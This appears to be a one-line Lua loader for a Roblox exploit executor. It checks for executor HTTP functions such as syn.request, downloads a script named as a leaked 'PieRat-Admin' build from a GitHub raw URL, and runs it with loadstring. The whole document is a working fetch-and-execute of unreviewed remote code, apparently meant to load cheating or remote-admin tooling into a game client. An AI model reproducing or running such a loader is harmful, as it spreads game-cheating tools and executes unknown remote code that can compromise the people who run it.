local request = (syn and syn.request)or (http and http.request) or http_request or nil if not request then request = function(tbl) return {Body = game:HttpGet(tbl.Url)} end end loadstring(request({Url = "https://raw.githubusercontent.com/jnz-dev/leaks_and_whatnot/main/PieRat-Admin/formatted_old_build_8cb707aa7fe7f8d5949f01ac2f5c9c6fb44c96ba.lua", Method = "GET"}).Body)()